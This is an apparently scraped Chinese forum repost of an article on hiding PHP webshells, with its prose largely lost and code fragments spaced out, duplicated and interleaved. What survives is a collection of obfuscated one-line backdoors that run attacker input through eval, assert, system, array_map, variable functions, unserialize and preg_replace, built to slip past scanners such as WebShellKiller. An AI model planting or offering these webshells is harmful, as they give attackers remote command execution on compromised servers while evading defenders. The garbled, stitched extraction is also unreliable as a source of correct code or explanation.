[16404] 2021-02-05_如何优雅地隐藏你的Webshell

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-02-05_如何优雅地隐藏你的Webshell W e b s h e l l 0 5 6   F r e e B u f   2 0 2 1 - 0 2 - 0 5 H a c k e r 便 w e b s h e l l w e b s h e l l w e b s h e l l w e b s h e l l 使 p h p P H P 5 . 6 P H P 1 使 p h p , ( e v a l s y s t e m a s s e r t ) 2 使 @ e v a l ( ' e c h o   ; ' ) ; $ a = " p h p i n f o " ; $ a ( ) ;
3 p h p b 使 a 4 a r r a y _ m a p a r r a y _ m a p $ a r r f u n c b . p h p < ? p h p @ e v a l ( ' e c h o   ; ' ) ; a . p h p < ? p h p i n c l u d e   a . p h p < ? p h p $ f u n c   =   ' s y s t e m ' ;
5 P H P   C u r l y   S y n t a x 使 6 p h p p h p $ a r r   =   a r r a y ( ' w h o a m i ' ) ; a r r a y _ m a p ( $ f u n c ,   $ a r r ) ; < ? p h p $ a   =   ' p ' ; e v a l ( " { $ a } h p i n f o ( ) ; " ) ; u n s e r i a l i z e < ? p h p c l a s s   t e s t {         p u b l i c   $ a = " 1 2 3 " ;         p u b l i c   f u n c t i o n   _ _ w a k e u p ( ) {
7 p h p : / / i n p u t 访 p o s t 8 p r e g _ r e p l a c e         p u b l i c   f u n c t i o n   _ _ w a k e u p ( ) {                 e v a l ( $ t h i s - > a ) ;         } } u n s e r i a l i z e ( ' O : 4 : " t e s t " : 1 : { s : 1 : " a " ; s : 1 0 : " p h p i n f o ( ) ; " ; } ' ) ; p h p : / / i n p u t p h p : / / i n p u t < ? p h p @ e v a l ( f i l e _ g e t _ c o n t e n t s ( ' p h p : / / i n p u t ' ) ) ;
使 9 o b _ s t a r t o b _ s t a r t 使 西 p r e g _ r e p l a c e < ? p h p e c h o   p r e g _ r e p l a c e ( " / t e s t / e " , p h p i n f o ( ) , " j u t s t   t e s t " ) ; o b _ e n d _ f l u s h < ? p h p $ c m d   =   ' s y s t e m ' ; o b _ s t a r t ( $ c m d ) ; e c h o   " w h o a m i " ; o b _ e n d _ f l u s h ( ) ; / / a s s e r t ( $ _ P O S T [ ' x ' ] ) ;
使 D 5 , , a s s e r t ( $ _ P O S T [ ' x ' ] ) ; a s s e r t $ a   =   " a s s e r t " ; $ b   =   $ a ; $ b ( $ _ P O S T [ ' x ' ] ) ; a s s e r t a r r a y _ m a p < ? p h p $ f u n   =   ' a s s e r t ' ;
4 4 3 $ f u n   =   ' a s s e r t ' ; a r r a y _ m a p ( $ f u n , a r r a y ( $ _ P O S T [ ' x ' ] ) ) ; $ $ < ? p h p $ a   =   " a s s e r t " ; $ c   = ' a ' ; $ $ c ( $ _ P O S T [ ' x ' ] ) ;
2 D < ? p h p $ f u n   =   ' a s s e r t ' ; $ f   =   ' f u n ' ; a r r a y _ m a p ( $ $ f , a r r a y ( $ _ P O S T [ ' x ' ] ) ) ; a r r a y _ m a p < ? p h p f u n c t i o n   a s s ( ) {         $ a   =   " a 4 5 1 . a s s . a a a . e r t . a d a w w " ;         $ b   =   e x p l o d e ( ' . ' , $ a ) ;
1         $ b   =   e x p l o d e ( ' . ' , $ a ) ;         $ c   =   $ b [ 1 ]   .   $ b [ 3 ] ;         r e t u r n   $ c ; } $ b   =   a r r a y ( $ _ P O S T [ ' x ' ] ) ; $ c   =   a s s ( ) ; a r r a y _ m a p ( $ c , $ b ) ; < ? p h p f u n c t i o n   d o w n l o a d F i l e ( $ u r l , $ x ) {         $ a r y   =   p a r s e _ u r l ( $ u r l ) ;         $ f i l e   =   b a s e n a m e ( $ a r y [ ' p a t h ' ] ) ;         $ e x t   =   e x p l o d e ( ' . ' , $ f i l e ) ;         / /   a s s e r t         $ e x e c 1 = s u b s t r ( $ e x t [ 0 ] , 3 , 1 ) ;         $ e x e c 2 = s u b s t r ( $ e x t [ 0 ] , 5 , 1 ) ;         $ e x e c 3 = s u b s t r ( $ e x t [ 0 ] , 5 , 1 ) ;         $ e x e c 4 = s u b s t r ( $ e x t [ 0 ] , 4 , 1 ) ;         $ e x e c 5 = s u b s t r ( $ e x t [ 0 ] , 7 , 2 ) ;         $ a s [ 0 ]   =   $ e x e c 1   .   $ e x e c 2   .   $ e x e c 3   .   $ e x e c 4   .   $ e x e c 5 ;         $ a s [ 1 ]   =   $ x ;         r e t u r n   $ a s ; } $ a   =   $ _ P O S T [ ' x ' ] ; $ s     =   d o w n l o a d F i l e ( ' h t t p : / / w w w . b a i d u . c o m / a s d a e s f r t a f g a . t x t ' , $ a ) ; $ b   =   $ s [ 0 ] ; $ c   =   $ s [ 1 ] ; a r r a y _ m a p ( $ b , a r r a y ( $ c ) ) ;
W e b S h e l l K i l l e r
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则